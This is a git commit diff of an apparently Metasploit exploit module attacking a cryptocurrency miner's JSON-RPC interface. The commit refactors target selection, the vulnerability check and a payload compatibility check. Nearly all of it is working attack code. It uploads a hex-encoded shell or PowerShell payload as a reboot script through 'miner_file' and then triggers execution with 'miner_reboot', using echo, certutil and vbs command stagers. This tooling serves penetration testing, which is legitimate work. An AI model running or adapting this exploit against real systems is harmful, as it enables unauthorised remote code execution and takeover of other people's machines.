refactor: universal check, payload platform check
parent
e9db949418
commit
53f158ef4f
|
@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => ['win', 'linux'],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { 'auto' => true }],
|
||||
[ 'Linux',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X64
|
||||
'Arch' => ARCH_X64,
|
||||
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
|
||||
}
|
||||
],
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'windows',
|
||||
'Arch' => ARCH_X64
|
||||
'Arch' => ARCH_X64,
|
||||
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
|
||||
}
|
||||
]
|
||||
],
|
||||
|
@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
cmd = Rex::Text.to_hex(cmd, '')
|
||||
when 'windows'
|
||||
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
|
||||
end
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
upload = {
|
||||
def select_target
|
||||
data = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bash', "#{cmd}"]
|
||||
}.to_json
|
||||
when 'windows'
|
||||
upload = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bat', "#{cmd}"]
|
||||
}.to_json
|
||||
end
|
||||
begin
|
||||
connect
|
||||
sock.put(upload)
|
||||
buf = sock.get_once || ''
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
print_error(e)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
trigger_vulnerability
|
||||
end
|
||||
|
||||
def trigger_vulnerability
|
||||
execute = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_reboot'
|
||||
"method" => 'miner_getfile',
|
||||
"params" => ['config.txt']
|
||||
}.to_json
|
||||
connect
|
||||
sock.put(execute)
|
||||
sock.put(data)
|
||||
buf = sock.get_once || ''
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
print_error(e)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
execute_cmdstager
|
||||
when 'windows'
|
||||
execute_cmdstager(linemax: 20000)
|
||||
tmp = StringIO.new
|
||||
tmp << buf
|
||||
tmp2 = tmp.string
|
||||
hex = ''
|
||||
if tmp2.scan(/\w+/)[5]
|
||||
return self.targets[1]
|
||||
elsif tmp2.scan(/\w+/)[7]
|
||||
return self.targets[2]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
target = select_target
|
||||
if target.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
data = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
|
@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
when 'windows'
|
||||
hex = tmp2.scan(/\w+/)[7]
|
||||
end
|
||||
if not hex
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
str = Rex::Text.hex_to_raw(hex)
|
||||
if str.include?('WARNING')
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
vprint_error(e)
|
||||
vprint_error(e.message)
|
||||
return Exploit::CheckCode::Unknown
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
target = select_target
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
cmd = Rex::Text.to_hex(cmd, '')
|
||||
upload = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bash', "#{cmd}"]
|
||||
}.to_json
|
||||
when 'windows'
|
||||
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
|
||||
upload = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bat', "#{cmd}"]
|
||||
}.to_json
|
||||
end
|
||||
|
||||
connect
|
||||
sock.put(upload)
|
||||
buf = sock.get_once || ''
|
||||
trigger_vulnerability
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
fail_with(Failure::UnexpectedReply, e.message)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def trigger_vulnerability
|
||||
execute = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_reboot'
|
||||
}.to_json
|
||||
connect
|
||||
sock.put(execute)
|
||||
buf = sock.get_once || ''
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
target = select_target
|
||||
if target.nil?
|
||||
fail_with(Exploit::Failure::NoTarget, 'No matching target')
|
||||
end
|
||||
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
|
||||
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
|
||||
fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'"
|
||||
end
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
execute_cmdstager(flavor: :echo, linemax: 100000)
|
||||
when 'windows'
|
||||
execute_cmdstager(flavor: :vbs, linemax: 100000)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue